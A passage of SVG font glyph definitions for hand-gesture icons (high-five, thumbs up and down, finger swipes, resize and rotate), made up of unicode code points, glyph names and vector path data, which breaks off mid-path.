<glyph unicode="&#xebec;" glyph-name="high-five" d="M896 272v384.2c0 44.1-35.5 79.8-80 79.8-18 0-34.6-5.9-48-15.9v31.8c0 44.2-35.5 80.1-80 80.1-18 0-34.6-6-48-16.1 0 44.2-35.5 80.1-80 80.1-44.1 0-79.9-35.7-80-79.9-13.3 10-29.9 15.9-48 15.9-44.2 0-80-35.7-80-80.3v-251.5c-62.6 58.5-134 102.2-179.5 56.7-63.6-63.6 70-188.4 174.4-378.6 72.4-131.8 177.5-178.3 277.1-178.3 150.2 0 272 121.8 272 272v0zM624 32c-120.3 0-191.7 65.6-248.1 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v329.8c0 26.5 21.5 47.8 48 47.8 26.7 0 48-21.4 48-47.8v-304.2h32v368.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-336.3h32v271.9c0 26.9 21.5 48.1 48 48.1 26.7 0 48-21.5 48-48.1v-303.9h32v208.3c0 26.5 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-384.3c0-132.5-107.5-240-240-240v0z" />
<glyph unicode="&#xebed;" glyph-name="high-five2" d="M638.952 631.678v120.203c0 26.935 21.49 48.119 48 48.119 26.694 0 48-21.543 48-48.119v-303.881h32v208.28c0 26.519 21.49 47.72 48 47.72 26.694 0 48-21.365 48-47.72v-384.28c0-132.548-107.452-240-240-240-0.013 0-0.027 0-0.040 0-120.271 0.015-191.64 65.636-248.044 160.541-125.184 210.636-209.791 307.079-175.002 342.057 35.194 35.384 118.886-40.197 183.086-110.067v327.193c0 26.951 21.49 48.276 48 48.276 26.694 0 48-21.614 48-48.276v-303.724h32v368.291c0 26.070 21.49 47.709 48 47.709 26.694 0 48-21.36 48-47.709v-336.291h32v151.678z" />
<glyph unicode="&#xebee;" glyph-name="thumb-up" d="M352 544h-192.061c-35.313 0-63.939-28.482-63.939-64.003v-415.993c0-35.348 28.375-64.003 63.939-64.003h623.792c44.331 0 80.269 35.509 80.269 80 0 18.010-5.931 34.63-15.976 48.001 44.197 0.156 79.976 35.607 79.976 79.999 0 20.345-7.568 38.916-20.087 53.034 30.43 11.302 52.087 40.428 52.087 74.966 0 20.345-7.568 38.916-20.087 53.034 30.43 11.302 52.087 40.428 52.087 74.966 0 44.183-35.693 80-80.269 80h-191.739c33.578 160.539 17.492 352-111.992 352s-61.877-153.205-112-248.406c-50.123-95.202-144-103.594-144-103.594v0 0zM159.705 512h160.295v-480h-160.295c-17.274 0-31.705 14.434-31.705 32.239v415.521c0 17.874 14.195 32.239 31.705 32.239zM224 96c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0 0zM681.6 512h230.621c26.535 0 47.779-21.49 47.779-48 0-26.694-21.391-48-47.779-48h-112.221v-32h80.221c26.535 0 47.779-21.49 47.779-48 0-26.694-21.391-48-47.779-48h-112.221v-32h80.221c26.535 0 47.779-21.49 47.779-48 0-26.694-21.391-48-47.779-48h-112.221v-32h47.946c26.576 0 48.054-21.49 48.054-48 0-26.694-21.514-48-48.054-48h-431.946c0 0 0 416 0 480 48 0 89.792 32 89.792 32 29.127 18.186 60.678 45.703 82.083 86.359 50.123 95.202-7.742 233.641 84.125 233.641 94.728 0 110.337-155.288 80.038-320 0 0-6.437-32-6.437-32v0 0z" />
<glyph unicode="&#xebef;" glyph-name="thumb-up2" d="M320 32h431.946c26.539 0 48.054 21.306 48.054 48 0 26.51-21.478 48-48.054 48h-47.946v32h112.221c26.388 0 47.779 21.306 47.779 48 0 26.51-21.244 48-47.779 48h-80.221v32h112.221c26.388 0 47.779 21.306 47.779 48 0 26.51-21.244 48-47.779 48h-80.221v32h112.221c26.388 0 47.779 21.306 47.779 48 0 26.51-21.244 48-47.779 48h-230.621c38.424 176 27.248 352-73.6 352-91.867 0-34.002-138.439-84.125-233.641s-155.874-118.359-155.875-118.359h-16v-480zM159.933 512h128.067v-480h-128.067c-35.189 0-63.933 28.538-63.933 63.74v352.519c0 35.152 28.624 63.74 63.933 63.74zM192 96c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0 0z" />
<glyph unicode="&#xebf0;" glyph-name="thumb-down" d="M320 352h-192.061c-35.313 0-63.939 28.482-63.939 64.003v415.993c0 35.348 28.375 64.003 63.939 64.003h623.792c44.331 0 80.269-35.509 80.269-80 0-18.010-5.931-34.63-15.976-48.001 44.197-0.156 79.976-35.607 79.976-79.999 0-20.345-7.568-38.916-20.087-53.034 30.43-11.302 52.087-40.428 52.087-74.966 0-20.345-7.568-38.916-20.087-53.034 30.43-11.302 52.087-40.428 52.087-74.966 0-44.183-35.693-80-80.269-80h-191.739c33.578-160.539 17.492-352-111.992-352s-61.877 153.205-112 248.406c-50.123 95.202-144 103.594-144 103.594v0 0zM127.705 384h160.295v480h-160.295c-17.274 0-31.705-14.434-31.705-32.239v-415.521c0-17.874 14.195-32.239 31.705-32.239zM192 800c17.673 0 32-14.327 32-32s-14.327-32-32-32c-17.673 0-32 14.327-32 32s14.327 32 32 32v0 0zM649.6 384h230.621c26.535 0 47.779 21.49 47.779 48 0 26.694-21.391 48-47.779 48h-112.221v32h80.221c26.535 0 47.779 21.49 47.779 48 0 26.694-21.391 48-47.779 48h-112.221v32h80.221c26.535 0 47.779 21.49 47.779 48 0 26.694-21.391 48-47.779 48h-112.221v32h47.946c26.576 0 48.054 21.49 48.054 48 0 26.694-21.514 48-48.054 48h-431.946c0 0 0-416 0-480 48 0 89.792-32 89.792-32 29.127-18.186 60.678-45.703 82.083-86.359 50.123-95.202-7.742-233.641 84.125-233.641 94.728 0 110.337 155.288 80.038 320 0 0-6.437 32-6.437 32v0 0z" />
<glyph unicode="&#xebf1;" glyph-name="thumb-down2" d="M320 864h431.946c26.539 0 48.054-21.306 48.054-48 0-26.51-21.478-48-48.054-48h-47.946v-32h112.221c26.388 0 47.779-21.306 47.779-48 0-26.51-21.244-48-47.779-48h-80.221v-32h112.221c26.388 0 47.779-21.306 47.779-48 0-26.51-21.244-48-47.779-48h-80.221v-32h112.221c26.388 0 47.779-21.306 47.779-48 0-26.51-21.244-48-47.779-48h-230.621c38.424-176 27.248-352-73.6-352-91.867 0-34.002 138.439-84.125 233.641s-155.874 118.359-155.875 118.359h-16v480zM159.933 384h128.067v480h-128.067c-35.189 0-63.933-28.538-63.933-63.74v-352.519c0-35.152 28.624-63.74 63.933-63.74zM192 800c17.673 0 32-14.327 32-32s-14.327-32-32-32c-17.673 0-32 14.327-32 32s14.327 32 32 32v0 0z" />
<glyph unicode="&#xebf2;" glyph-name="thumb-up3" d="M615.962 0h136.114c44.141 0 79.924 35.509 79.924 80 0 18.010-5.996 34.63-16.069 48 44.239 0.107 80.069 35.576 80.069 80 0 20.345-7.568 38.916-20.087 53.034v0c30.43 11.302 52.087 40.428 52.087 74.966 0 20.345-7.568 38.916-20.087 53.034 30.43 11.302 52.087 40.428 52.087 74.966 0 44.183-35.693 80-80.269 80h-191.739c33.578 160.539 17.492 352-111.992 352s-61.877-153.205-112-248.406c-50.122-95.198-143.993-103.593-144-103.594h-192.157c-35.259 0-63.843-28.589-63.843-63.74v-352.519c0-35.203 28.375-63.74 63.939-63.74h192.061l192-64h103.962zM336 512c0 0 105.752 23.158 155.875 118.359s-7.742 233.641 84.125 233.641c100.848 0 112.023-176 73.6-352v0h230.621c26.535 0 47.779-21.49 47.779-48 0-26.694-21.391-48-47.779-48h-112.221v-32h80.221c26.535 0 47.779-21.49 47.779-48 0-26.694-21.391-48-47.779-48h-112.221v-32h80.221c26.535 0 47.779-21.49 47.779-48 0-26.694-21.391-48-47.779-48h-112.221v-32h47.946c26.576 0 48.054-21.49 48.054-48 0-26.694-21.514-48-48.054-48h-239.946l-192 64h-191.906c-18.082 0-32.094 14.305-32.094 31.952v352.096c0 17.632 14.326 31.952 31.999 31.952h208.001z" />
<glyph unicode="&#xebf3;" glyph-name="thumb-up4" d="M649.6 512h230.621c26.535 0 47.779-21.49 47.779-48 0-26.694-21.391-48-47.779-48h-112.221v-32h80.221c26.535 0 47.779-21.49 47.779-48 0-26.694-21.391-48-47.779-48h-112.221v-32h80.221c26.535 0 47.779-21.49 47.779-48 0-26.694-21.391-48-47.779-48h-112.221v-32h47.946c26.576 0 48.054-21.49 48.054-48 0-26.694-21.514-48-48.054-48h-239.946l-192 64h-191.906c-18.082 0-32.094 14.305-32.094 31.952v352.096c0 17.632 14.326 31.952 31.999 31.952h208.001c0 0 105.752 23.158 155.875 118.359s-7.742 233.641 84.125 233.641c100.848 0 112.023-176 73.6-352v0z" />
<glyph unicode="&#xebf4;" glyph-name="thumb-down3" d="M615.962 896h136.114c44.141 0 79.924-35.509 79.924-80 0-18.010-5.996-34.63-16.069-48 44.239-0.107 80.069-35.576 80.069-80 0-20.345-7.568-38.916-20.087-53.034v0c30.43-11.302 52.087-40.428 52.087-74.966 0-20.345-7.568-38.916-20.087-53.034 30.43-11.302 52.087-40.428 52.087-74.966 0-44.183-35.693-80-80.269-80h-191.739c33.578-160.539 17.492-352-111.992-352s-61.877 153.205-112 248.406c-50.122 95.198-143.993 103.593-144 103.594h-192.157c-35.259 0-63.843 28.589-63.843 63.74v352.519c0 35.203 28.375 63.74 63.939 63.74h192.061l192 64h103.962zM336 384c0 0 105.752-23.158 155.875-118.359s-7.742-233.641 84.125-233.641c100.848 0 112.023 176 73.6 352v0h230.621c26.535 0 47.779 21.49 47.779 48 0 26.694-21.391 48-47.779 48h-112.221v32h80.221c26.535 0 47.779 21.49 47.779 48 0 26.694-21.391 48-47.779 48h-112.221v32h80.221c26.535 0 47.779 21.49 47.779 48 0 26.694-21.391 48-47.779 48h-112.221v32h47.946c26.576 0 48.054 21.49 48.054 48 0 26.694-21.514 48-48.054 48h-239.946l-192-64h-191.906c-18.082 0-32.094-14.305-32.094-31.952v-352.096c0-17.632 14.326-31.952 31.999-31.952h208.001z" />
<glyph unicode="&#xebf5;" glyph-name="thumb-down4" d="M649.6 384h230.621c26.535 0 47.779 21.49 47.779 48 0 26.694-21.391 48-47.779 48h-112.221v32h80.221c26.535 0 47.779 21.49 47.779 48 0 26.694-21.391 48-47.779 48h-112.221v32h80.221c26.535 0 47.779 21.49 47.779 48 0 26.694-21.391 48-47.779 48h-112.221v32h47.946c26.576 0 48.054 21.49 48.054 48 0 26.694-21.514 48-48.054 48h-239.946l-192-64h-191.906c-18.082 0-32.094-14.305-32.094-31.952v-352.096c0-17.632 14.326-31.952 31.999-31.952h208.001c0 0 105.752-23.158 155.875-118.359s-7.742-233.641 84.125-233.641c100.848 0 112.023 176 73.6 352v0 0z" />
<glyph unicode="&#xebf6;" glyph-name="two-fingers-swipe-left" d="M352 736v-267.737c-62.565 58.516-133.992 102.16-179.484 56.667-63.592-63.592 69.959-188.37 174.391-378.633 72.352-131.816 177.48-178.297 277.094-178.297 150.221 0 272 121.779 272 272v191.542c0 44.185-35.509 80.004-80 80.004-18.010 0-34.629-5.898-48-15.901v0.431c0 44.141-35.509 79.924-80 79.924-18.010 0-34.629-5.996-48-16.068v223.958c0 44.244-35.509 80.111-80 80.111-34.342 0-63.63-21.606-74.973-52.056-14.072 12.482-32.603 20.056-53.027 20.056-38.652 0-70.902-27.317-78.37-64h-227.23l104 104-24 24-144-144 144-144 24 24-104 104h225.6zM624 0c-120.311 0.015-191.68 65.636-248.084 160.541-125.184 210.636-214.832 307.019-180.043 341.996 35.539 35.731 122.258-41.671 188.127-112.084v361.379c0 26.82 21.49 48.168 48 48.168 26.694 0 48-21.565 48-48.168v-335.832h32v368.291c0 26.070 21.49 47.709 48 47.709 26.694 0 48-21.36 48-47.709v-336.291h32v47.794c0 26.717 21.49 48.206 48 48.206 26.694 0 48-21.583 48-48.206v-79.794h32v15.946c0 26.576 21.49 48.054 48 48.054 26.694 0 48-21.514 48-48.054v-191.946c0-132.548-107.452-240-240-240v0z" />
<glyph unicode="&#xebf7;" glyph-name="two-fingers-swipe-left2" d="M420.356 736c6.609 18.779 24.371 32 45.244 32 26.694 0 48-21.614 48-48.276v-303.724h32v368.291c0 26.070 21.49 47.709 48 47.709 26.694 0 48-21.36 48-47.709v-336.291h32v80.28c0 26.519 21.49 47.72 48 47.72 26.694 0 48-21.365 48-47.72v-112.28h32v79.795c0 26.558 21.49 48.205 48 48.205 26.694 0 48-21.582 48-48.205v-255.795c0-132.548-107.452-240-240-240-120.311 0.015-191.68 65.636-248.084 160.541-125.184 210.636-214.832 307.019-180.043 341.996 35.539 35.731 122.258-41.671 188.127-112.084v313.547h-225.6l104-104-24-24-144 144 144 144 24-24-104-104h228.356z" />
<glyph unicode="&#xebf8;" glyph-name="two-fingers-swipe-right" d="M640 736h225.6l-104-104 24-24 144 144-144 144-24-24 104-104h-225.6v15.889c0 44.244-35.509 80.111-80 80.111-34.342 0-63.63-21.606-74.973-52.056-14.072 12.482-32.603 20.056-53.027 20.056-44.183 0-80-35.693-80-80.269v-283.468c-62.565 58.516-133.992 102.16-179.484 56.667-63.592-63.592 69.959-188.37 174.391-378.633 72.352-131.816 177.48-178.297 277.094-178.297 150.221 0 272 121.779 272 272v191.542c0 44.185-35.509 80.004-80 80.004-18.010 0-34.629-5.898-48-15.901v0.431c0 44.141-35.509 79.924-80 79.924-18.010 0-34.629-5.996-48-16.068v176.068zM624 0c-120.311 0.015-191.68 65.636-248.084 160.541-125.184 210.636-214.832 307.019-180.043 341.996 35.539 35.731 122.258-41.671 188.127-112.084v361.379c0 26.82 21.49 48.168 48 48.168 26.694 0 48-21.565 48-48.168v-335.832h32v368.291c0 26.070 21.49 47.709 48 47.709 26.694 0 48-21.36 48-47.709v-336.291h32v47.794c0 26.717 21.49 48.206 48 48.206 26.694 0 48-21.583 48-48.206v-79.794h32v15.946c0 26.576 21.49 48.054 48 48.054 26.694 0 48-21.514 48-48.054v-191.946c0-132.548-107.452-240-240-240v0z" />
<glyph unicode="&#xebf9;" glyph-name="two-fingers-swipe-right2" d="M575.7 704v-256h32v80.3c0 26.5 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-112.3h32v79.8c0 26.6 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-255.8c0-132.5-107.5-240-240-240-120.3 0-191.7 65.6-248.1 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v329.3c0 27 21.5 48.3 48 48.3 26.7 0 48-21.6 48-48.3v-303.7h32v368.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-48.3h257.6l-104 104 24 24 144-144-144-144-24 24 104 104h-257.6z" />
<glyph unicode="&#xebfa;" glyph-name="two-fingers-swipe-up" d="M608 32.4c5.2-0.3 10.6-0.4 16-0.4 132.5 0 240 107.5 240 240v191.9c0 26.5-21.3 48.1-48 48.1-26.5 0-48-21.5-48-48.1v-15.9h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-47.8h-32v336.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v335.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.3-48-48.2v-361.4c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 48.5-81.5 108-141.5 200.1-156.7v285.8l-104-104-24 24 144 144 144-144-24-24-104 104v-289.2zM896 272c0-150.2-121.8-272-272-272-99.6 0-204.7 46.5-277.1 178.3-104.4 190.3-238 315-174.4 378.6 45.5 45.5 116.9 1.8 179.5-56.7v0 283.5c0 44.6 35.8 80.3 80 80.3 20.4 0 39-7.6 53-20.1 11.4 30.5 40.6 52.1 75 52.1 44.5 0 80-35.9 80-80.1v-224c13.4 10.1 30 16.1 48 16.1 44.5 0 80-35.8 80-79.9v-0.4c13.4 10 30 15.9 48 15.9 44.5 0 80-35.8 80-80v-191.6z" />
<glyph unicode="&#xebfb;" glyph-name="two-fingers-swipe-up2" d="M607.7 32.4c-110.7 5.6-178.2 69.5-232.1 160.1-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v329.3c0 27 21.5 48.3 48 48.3 26.7 0 48-21.6 48-48.3v-303.7h32v368.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-336.3h32v80.3c0 26.5 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-112.3h32v79.8c0 26.6 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-255.8c0-127.2-98.9-231.2-224-239.5v289.1l104-104 24 24-144 144-144-144 24-24 104 104v-289.2z" />
<glyph unicode="&#xebfc;" glyph-name="two-fingers-swipe-down" d="M640 190.4l104 104 24-24-144-144-144 144 24 24 104-104v625.9c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v335.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.3-48-48.2v-361.4c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.4-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v191.9c0 26.5-21.3 48.1-48 48.1-26.5 0-48-21.5-48-48.1v-15.9h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-337.4zM896 272c0-150.2-121.8-272-272-272-99.6 0-204.7 46.5-277.1 178.3-104.4 190.3-238 315-174.4 378.6 45.5 45.5 116.9 1.8 179.5-56.7v0 283.5c0 44.6 35.8 80.3 80 80.3 20.4 0 39-7.6 53-20.1 11.4 30.5 40.6 52.1 75 52.1 44.5 0 80-35.9 80-80.1v-224c13.4 10.1 30 16.1 48 16.1 44.5 0 80-35.8 80-79.9v-0.4c13.4 10 30 15.9 48 15.9 44.5 0 80-35.8 80-80v-191.6z" />
<glyph unicode="&#xebfd;" glyph-name="two-fingers-swipe-down2" d="M639.7 464v96.3c0 26.5 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-112.3h32v79.8c0 26.6 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-255.8c0-132.5-107.5-240-240-240-120.3 0-191.7 65.6-248.1 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v329.3c0 27 21.5 48.3 48 48.3 26.7 0 48-21.6 48-48.3v-303.7h32v368.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-625.9l-104 104-24-24 144-144 144 144-24 24-104-104v273.6z" />
<glyph unicode="&#xebfe;" glyph-name="two-fingers" d="M896 272v191.5c0 44.2-35.5 80-80 80-18 0-34.6-5.9-48-15.9v0.4c0 44.1-35.5 79.9-80 79.9-18 0-34.6-6-48-16.1v224c0 44.2-35.5 80.1-80 80.1-34.3 0-63.6-21.6-75-52.1-14.1 12.6-32.6 20.2-53 20.2-44.2 0-80-35.7-80-80.3v-283.5c-62.6 58.5-134 102.2-179.5 56.7-63.6-63.6 70-188.4 174.4-378.6 72.3-131.8 177.5-178.3 277.1-178.3 150.2 0 272 121.8 272 272v0zM624 32c-120.3 0-191.7 65.6-248.1 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v361.4c0 26.8 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-335.8h32v368.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-336.3h32v47.8c0 26.7 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-79.8h32v15.9c0 26.6 21.5 48.1 48 48.1 26.7 0 48-21.5 48-48.1v-191.9c0-132.5-107.5-240-240-240v0z" />
<glyph unicode="&#xebff;" glyph-name="two-fingers2" d="M575.7 816.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.4-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v112.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-80.3h-32v336.3z" />
<glyph unicode="&#xec00;" glyph-name="three-fingers-double-tap" d="M639.1 831.3c-20.3 20.2-48.2 32.7-79.1 32.7-34.5 0-65.4-15.6-85.9-40.2-13 5.3-27.2 8.2-42.1 8.2-30.9 0-58.9-12.5-79.2-32.8v0c-20.3-20.3-32.8-48.3-32.8-79.2v-90.5c-20 24.7-32 56.2-32 90.5 0 79.5 64.5 144 144 144 11.3 0 22.4-1.3 33-3.8 25.3 22.3 58.6 35.8 95 35.8 79.5 0 144-64.5 144-144 0-34.3-12-65.8-32-90.5v90.8c0 30.8-12.6 58.8-32.9 79v0 0zM672 616.2c39.1 32.3 64 81.1 64 135.8 0 97.2-78.8 176-176 176-38.7 0-74.5-12.5-103.6-33.7-8 1.1-16.1 1.7-24.4 1.7-97.2 0-176-78.8-176-176 0-54.7 24.9-103.5 64-135.8v0-39.5c-57.7 37-96 101.7-96 175.3 0 114.9 93.1 208 208 208 5.4 0 10.8-0.2 16.1-0.6 32.3 20.6 70.7 32.6 111.9 32.6 114.9 0 208-93.1 208-208 0-73.6-38.3-138.3-96-175.3v39.5zM896 208v191.5c0 44.2-35.5 80-80 80-18 0-34.6-5.9-48-15.9v0.4c0 44.1-35.5 79.9-80 79.9-18 0-34.6-6-48-16.1v224c0 44.2-35.5 80.1-80 80.1-34.3 0-63.6-21.6-75-52.1-14.1 12.5-32.6 20.1-53 20.1-44.2 0-80-35.7-80-80.3v-283.5c-62.6 58.5-134 102.2-179.5 56.7-63.6-63.6 70-188.4 174.4-378.6 72.3-131.7 177.5-178.2 277.1-178.2 150.2 0 272 121.8 272 272v0zM624-32c-120.3 0-191.7 65.6-248.1 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v361.4c0 26.8 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-335.8h32v368.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-336.3h32v47.8c0 26.7 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-79.8h32v15.9c0 26.6 21.5 48.1 48 48.1 26.7 0 48-21.5 48-48.1v-191.9c0-132.5-107.5-240-240-240v0z" />
<glyph unicode="&#xec01;" glyph-name="three-fingers-double-tap2" d="M639.7 673.6c19.8 20.2 32 47.9 32 78.4 0 61.9-50.1 112-112 112-45.8 0-85.2-27.5-102.6-66.9-8.2 1.9-16.7 2.9-25.4 2.9-61.9 0-112-50.1-112-112 0-30.5 12.2-58.2 32-78.4v78.4c0 43.9 35.8 80 80 80 18.1 0 34.7-5.9 48-15.9v0.2c0 43.6 35.8 79.7 80 79.7 44.5 0 80-35.7 80-79.7v-78.7zM639.7 632.2c38.6 25.8 64 69.8 64 119.8 0 79.5-64.5 144-144 144-50 0-94.1-25.5-119.9-64.2-2.7 0.1-5.4 0.2-8.1 0.2-79.5 0-144-64.5-144-144 0-49.9 25.4-93.9 64-119.8v-37.1c-57 29.1-96 88.4-96 156.8 0 94.6 74.6 171.7 168.1 175.8 32.3 39.3 81.2 64.3 135.9 64.3 97.2 0 176-78.8 176-176 0-68.4-39-127.7-96-156.8v37zM607.7 752.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.4-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v112.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-80.3h-32v336.3z" />
<glyph unicode="&#xec02;" glyph-name="two-fingers-resize-out" d="M197.744 730.256l22.627-22.627-131.629-131.629h103.258v-32h-160v160h32v-107.487l133.744 133.744zM250.256 741.744l-22.627 22.627 131.629 131.629h-103.258v32h160v-160h-32v107.487l-133.744-133.744zM992 208v191.542c0 44.185-35.509 80.004-80 80.004-18.010 0-34.629-5.898-48-15.901v0.431c0 44.141-35.509 79.924-80 79.924-18.010 0-34.629-5.996-48-16.068v223.958c0 44.244-35.509 80.111-80 80.111-34.342 0-63.63-21.606-74.973-52.056-14.072 12.482-32.603 20.056-53.027 20.056-44.183 0-80-35.693-80-80.269v-283.468c-62.565 58.516-133.992 102.16-179.484 56.667-63.592-63.592 69.959-188.37 174.391-378.633 72.352-131.816 177.48-178.297 277.094-178.297 150.221 0 272 121.779 272 272zM720-32c-120.311 0.015-191.68 65.636-248.084 160.541-125.184 210.636-214.832 307.019-180.043 341.996 35.539 35.731 122.258-41.671 188.127-112.084v361.379c0 26.82 21.49 48.168 48 48.168 26.694 0 48-21.565 48-48.168v-335.832h32v368.291c0 26.070 21.49 47.709 48 47.709 26.694 0 48-21.36 48-47.709v-336.291h32v47.794c0 26.717 21.49 48.206 48 48.206 26.694 0 48-21.583 48-48.206v-79.794h32v15.946c0 26.576 21.49 48.054 48 48.054 26.694 0 48-21.514 48-48.054v-191.946c0-132.548-107.452-240-240-240v0 0z" />
<glyph unicode="&#xec03;" glyph-name="two-fingers-resize-out2" d="M96 596.513l133.744 133.744 22.627-22.627-131.629-131.629h103.258v-32h-160v160h32v-107.487zM416 875.487l-133.744-133.744-22.627 22.627 131.629 131.629h-103.258v32h160v-160h-32v107.487zM736 752.291c0 26.349-21.306 47.709-48 47.709-26.51 0-48-21.639-48-47.709v-368.291h-32v303.724c0 26.662-21.306 48.276-48 48.276-26.51 0-48-21.325-48-48.276v-329.271c-65.869 70.413-152.588 147.815-188.127 112.084-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.084-160.541 132.548 0 240 107.452 240 240v255.795c0 26.623-21.306 48.205-48 48.205-26.51 0-48-21.647-48-48.205v-79.795h-32v112.28c0 26.355-21.306 47.72-48 47.72-26.51 0-48-21.201-48-47.72v-80.28h-32v336.291z" />
<glyph unicode="&#xec04;" glyph-name="two-fingers-resize-in" d="M422.1 928l22.6-22.6-131.6-131.7h103.3v-32h-160v160h32v-107.5l133.7 133.8zM58.6 523.5l-22.6 22.6 131.6 131.6h-103.2v32h160v-160h-32v107.5l-133.8-133.7zM992.4 213.7v191.6c0 44.2-35.5 80-80 80-18 0-34.6-5.9-48-15.9v0.4c0 44.1-35.5 79.9-80 79.9-18 0-34.6-6-48-16.1v224c0 44.2-35.5 80.1-80 80.1-34.3 0-63.6-21.6-75-52.1-14.1 12.5-32.6 20.1-53 20.1-44.2 0-80-35.7-80-80.3v-283.4c-62.6 58.5-134 102.2-179.5 56.7-63.6-63.6 70-188.4 174.4-378.6 72.4-131.8 177.5-178.3 277.1-178.3 150.2-0.1 272 121.7 272 271.9v0zM720.4-26.3c-120.3 0-191.7 65.6-248.1 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v361.5c0 26.8 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-335.8h32v368.2c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-336.3h32v47.8c0 26.7 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-79.8h32v15.9c0 26.6 21.5 48.1 48 48.1 26.7 0 48-21.5 48-48.1v-191.9c0-132.5-107.5-240-240-240v0 0z" />
<glyph unicode="&#xec05;" glyph-name="two-fingers-resize-in2" d="M454.1 928l22.6-22.6-131.6-131.7h103.3v-32h-160v160h32v-107.5l133.7 133.8zM90.6 523.5l-22.6 22.6 131.6 131.6h-103.2v32h160v-160h-32v107.5l-133.8-133.7zM736.4 758c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v303.8c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.2 112.1-34.8-35 54.9-131.4 180-342 56.4-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v255.7c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v112.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-80.3h-32v336.3z" />
<glyph unicode="&#xec06;" glyph-name="two-fingers-rotate" d="M138.212 561.906c-5.9 19.278-9.075 39.747-9.075 60.957 0 114.875 93.125 208 208 208 21.21 0 41.679-3.175 60.957-9.075v0l-83.585 83.585 22.627 22.627 113.137-113.137-33.137-33.137v-2.054c-0.453 0.232-0.908 0.462-1.364 0.69l-78.636-78.636-22.627 22.627 68.478 68.478c-14.619 3.934-29.989 6.032-45.85 6.032-97.202 0-176-78.798-176-176 0-15.861 2.098-31.232 6.032-45.85l68.478 68.478 22.627-22.627-78.636-78.636c0.228-0.456 0.458-0.91 0.69-1.364h-2.054l-33.137-33.137-113.137 113.137 22.627 22.627 83.585-83.585zM993.137 206.863v191.542c0 44.185-35.509 80.004-80 80.004-18.010 0-34.629-5.898-48-15.901v0.431c0 44.141-35.509 79.924-80 79.924-18.010 0-34.629-5.996-48-16.068v223.958c0 44.244-35.509 80.111-80 80.111-34.342 0-63.63-21.606-74.973-52.056-14.072 12.482-32.603 20.056-53.027 20.056-44.183 0-80-35.693-80-80.269v-283.468c-62.565 58.516-133.992 102.16-179.484 56.667-63.592-63.592 69.959-188.37 174.391-378.633 72.352-131.816 177.48-178.297 277.094-178.297 150.221 0 272 121.779 272 